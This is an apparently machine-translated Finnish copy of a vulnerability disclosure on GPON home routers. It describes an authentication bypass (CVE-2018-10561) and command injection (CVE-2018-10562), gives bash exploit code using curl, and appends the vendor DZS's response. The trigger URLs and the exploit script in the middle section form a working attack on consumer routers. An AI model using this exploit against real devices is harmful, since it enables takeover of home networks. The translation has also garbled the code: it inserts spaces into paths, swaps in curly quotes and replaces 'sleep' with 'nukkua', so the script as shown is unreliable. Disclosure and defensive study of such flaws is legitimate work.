Kriittinen RCE-haavoittuvuus löytyy yli miljoonasta GPON-kotireitittimestä


Kaksi tärkeää päivitystä tämän raportin julkaisemisen jälkeen:

  1. Tutkimusryhmämme loi korjaustiedoston, joka voi auttaa vaikuttavia käyttäjiä. Tarkista tämä täältä
  2. DASAN Zhone Solutions lähetti meille kommenttinsa raportista. Liitämme sen "sellaisenaan" tämän sivun loppuun

Yleiskatsaus:

Teimme kattavan arvioinnin useille GPON-kotireitittimille. Monet reitittimet käyttävät nykyään GPON-Internetiä ja löysimme tavan ohittaa kaikki laitteiden todennukset (CVE-2018-10561). Tällä todennuksen ohituksella, pystyimme paljastamaan myös toisen komentojen injektioheikkouden (CVE-2018-10562) ja suorittaa komennot laitteella.

hyväksikäyttö:

GPON-yritysohjelmistojen analyysimme aikana löysimme kaksi erilaista kriittistä haavoittuvuutta (CVE-2018-10561) & CVE-2018-10562), joka voisi yhdistelmällä mahdollistaa laitteen ja siten verkon täydellisen hallinnan. Ensimmäinen haavoittuvuus hyödyntää viallisen laitteen todennusmekanismia. Tämän puutteen ansiosta hyökkääjät voivat ohittaa kaiken todennuksen.

Vika löytyy HTTP-palvelimilta, jotka tarkistavat tietyt polut todennuksen yhteydessä. Tämän avulla hyökkääjä voi ohittaa todentamisen mistä tahansa päätepisteestä yksinkertaisella tempulla.

Liittämällä? Kuvia / URL-osoitteeseen hyökkääjä voi ohittaa päätepisteen.

Tämä toimii sekä HTML-sivuilla että GponForm /

Esimerkiksi lisäämällä

/menu.html?images/
tai
/ GponForm / diag_FORM? Kuvia /

voimme hallita laitetta.

Kun tutkimme laitteen toimintoja, huomasimme, että diagnostinen päätepiste sisälsi ping- ja traceroute-komennot. Ei kulunut paljon selvittää, että komennot voidaan injektoida isäntäparametrilla.

Koska reititin tallentaa ping-tulokset tiedostoon / tmp ja lähettää sen käyttäjälle, kun käyttäjä käy uudelleen /diag.html, on melko helppoa suorittaa komentoja ja hakea niiden lähtö todennuksen ohituksen haavoittuvuuden avulla.

Sisällytämme seuraavan hyökkäyskoodin bash-version:
#! / Bin / bash

echo “[+] Lähetetään komento…“
# Lähetämme komennot kahdella moodilla backtick (`) ja puolipisteellä (;), koska eri mallit laukaisevat eri laitteissa
curl -k -d “XWebPageName = diag&diag_action = ping&wan_conlist = 0&dest_host = \ '$ 2 \'; $ 2&ipv = 0 ”$ 1 / GponForm / diag_Form? images / 2>/ dev / null 1>/ Dev / null
echo “[+] Waiting….”
nukkua 3
echo “[+] Ouput noudetaan….”
curl -k $ 1 / diag.html? images / 2>/ dev / null | grep 'diag_result =' | sed -e 's / \\ n / \ n / g "

Vaikutus:

GPON on erityisen suosittu passiivinen optinen verkko, joka käyttää kuituoptiikkaa. Kun ihmiset käyttävät GPONia, Internet-palveluntarjoajat tarjoavat reitittimet. Videossa voit nähdä sen Yli miljoona ihmistä käyttää tämän tyyppisiä verkkojärjestelmäreitittimiä.

Testasimme tätä haavoittuvuutta monilla satunnaisilla GPON-reitittimillä ja heille kaikille löytyi haavoittuvuus. Koska niin monet ihmiset käyttävät tämäntyyppisiä reitittimiä, tämä haavoittuvuus voi johtaa koko verkon kompromissiin.

suositukset:

  1. Tarkista, käyttääkö reititin GPON-verkkoa.
  2. Huomaa, että GPON-reitittimiä voidaan hakkeroida ja hyödyntää.
  3. Keskustele palveluntarjoajasi kanssa nähdäksesi, mitä he voivat tehdä korjataksesi virheen.
  4. Varoita ystäviäsi Facebookissa (napsauta tätä jakaaksesi) ja Twitterissä (napsauta tätä twiittiä).

Päivitys: DZS: n ilmoitus todennuksen ohituksen hyväksikäytöstä

DASAN Zhone Solutions, Inc. on tutkinut viimeaikaisia ​​tiedotteita siitä, että tietyt DZS GPON -verkkoliitäntälaitteet (NID), jotka tunnetaan yleisemmin reitittiminä, saattavat olla alttiita autentikoinnin ohituksen hyväksikäytölle..

DZS on todennut, että tämä haavoittuvuus vaikuttaa ZNID-GPON-25xx-sarjaan ja tiettyihin H640series GPON ONT -laitteisiin, kun ne toimivat tietyillä ohjelmistojulkaisuilla. DZS: lle ei ole tähän mennessä ilmoitettu mitään tämän haavoittuvuuden aiheuttamia palveluvaikutuksia. Sisäisen tutkimuksen jälkeen olemme todenneet, että mahdolliset vaikutukset ovat paljon rajoitetumpia kuin vpnMentorin ilmoittamat. DZS: n myyntitietojen mukaan yhdistettynä tähän mennessä kerättyihin kenttätietoihin olemme arvioineet, että GPON ONT -yksiköiden lukumäärä voi olla mahdollisesti törmäys on alle 240 000. Lisäksi, ottaen huomioon tuotteiden suhteellisen kypsyyden niiden elinkaaren aikana, mielestämme vaikutus rajoittuu vielä vähemmän laitteisiin.

Tuotehistoria

DZS ZNID-GPON-25xx ja tietyt H640-sarjan ONT-laitteet, mukaan lukien ohjelmisto, joka otti käyttöön tämän haavoittuvuuden, kehitti OEM-toimittaja ja myi jälleen DZS: lle. Suunniteltu ja julkaistu yli 9 vuotta sitten, suurin osa näistä tuotteista on nyt mennyt pitkälle kestävän käyttöiänsä yli. Koska ohjelmistotuen sopimuksia ei enää tarjota suurimmalle osalle näistä tuotteista, meillä ei ole suoraa tietoa niiden yksiköiden kokonaismäärästä, joita edelleen aktiivisesti käytetään kentällä.

päätöslauselma

DZS on ilmoittanut haavoittuvuudesta kaikille asiakkaille, jotka ovat ostaneet nämä mallit. Teemme yhteistyötä kunkin asiakkaan kanssa auttaaksemme heitä arvioimaan menetelmiä ongelman ratkaisemiseksi yksiköille, jotka voidaan vielä asentaa kenttään. Jokaisen asiakkaan on harkittava itse päättääkseen, miten hänen käyttämiensä laitteiden tila täytetään.

DZS: n tehtävänä on varmistaa, että kaikki ratkaisut täyttävät alan korkeimmat turvallisuusstandardit. Hyväksymme tämän ja jokaisen mahdollisuuden tarkistaa ja jatkuvasti parantaa tietoturvasuunnittelua ja testausmenetelmiämme.

Brayan Jackson Administrator
Candidate of Science in Informatics. VPN Configuration Wizard. Has been using the VPN for 5 years. Works as a specialist in a company setting up the Internet.
follow me
Like this post? Please share to your friends:
Leave a Reply

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

5 + = 6

map